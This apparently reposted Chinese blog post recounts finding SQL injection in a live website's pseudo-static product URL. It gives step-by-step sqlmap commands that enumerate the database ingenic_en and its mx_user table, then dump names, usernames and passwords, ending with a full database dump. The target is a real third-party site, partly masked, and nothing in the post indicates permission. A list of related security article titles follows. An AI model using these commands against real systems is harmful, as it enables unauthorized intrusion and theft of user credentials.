伪静态注入

简介:

今天在学习的过程中发现了一个网站的伪静态含有注入,便对此进行了渗透

wKioL1j6zfWzo1wYAABrN7eFsB0527.png-wh_50

利用工具:sqlmap

我在”/id/12.html“上的12后面加上*,然后放在sqlmap上爆

先查看当前的数据库,命令为sqlmap.py -u url --current-db,查看的数据库为下图

wKiom1j6zt7iwKQCAAAwlwJpw84378.png-wh_50

1:查看这个数据库里面的表,指定数据库命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en --tables

wKiom1j6z5OxvyHuAAAPN8T91gM344.png-wh_50


2:找出表中含有的字段,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user --columns

wKiom1j60ECy71XEAAA9Nc4DEmA274.png-wh_50


3:爆这些字段的内容:name,password,username,命令为python sqlmap/sqlmap.py -u "http://www.***.com/en/?product/id/12*.html" -D ingenic_en -T mx_user -C name,password,username --dump

wKiom1j60WWD5SGBAABDIsgW_98897.png-wh_50


如上所示,爆出了字段的内容,获得了用户名和密码,密码是需要解密的,最后是拖库




本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918427
相关文章
|
4月前
|
SQL 程序员 PHP
PHP网页下的注入原理
PHP网页下的注入原理
|
SQL 安全 PHP
理解php对象注入
php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识。
|
SQL 应用服务中间件 nginx
nginx禁止外网访问登录页面,SQL 注入、XSS 攻击配置
nginx禁止外网访问登录页面,SQL 注入、XSS 攻击配置
720 0
|
搜索推荐
rpcms配置自定义伪静态规则的方法
rpcms默认自带有伪静态规则,可以直接使用,但会千篇一律。如果根据自己需求,个性化的自定义伪静态规则就舒服了。如何去配置呢? 在/setting/route/index.php文件中,这个文件就是默认的伪静态规则,可以在这里面去修改规则。如何配置呢?规则采用的是数组方式配置,含有四个元素: model:模块路径,格式:应用/控制器/方法;pattern:自定义的路由规则;replace:变量规则;ext:后缀名,支持多个,未配置则默认html。
ThinkPHP3.2.3 where注入
ThinkPHP3.2.3 where注入
144 0
ThinkPHP3.2.3 where注入
|
PHP Apache
phpstudy配置伪静态的方法
mod_rewrite是Apache的一个非常强大的功能,它可以实现伪静态页面。下面我详细说说它的使用方法1.检测Apache是否支持mod_rewrite通过php提供的phpinfo()函数查看环境配置,通过Ctrl+F查找到“Loaded Modules”,其中列出了所有apache2handler已经开启的模块,如果里面包括“mod_rewrite”,则已经支持,不再需要继续设置。
3019 0
|
Linux
Discuz!X3.1标签伪静态修改和伪静态规则
Discuz!X3.1标签伪静态修改和伪静态规则
393 0
|
数据安全/隐私保护
怎么将aspx网站改为静态页面?
首先思路是在后台点击“生成静态页面” 转换为静态页面 protected void Button2_Click(object sender, EventArgs e) { DataSet ds = Getyuqian().
1664 0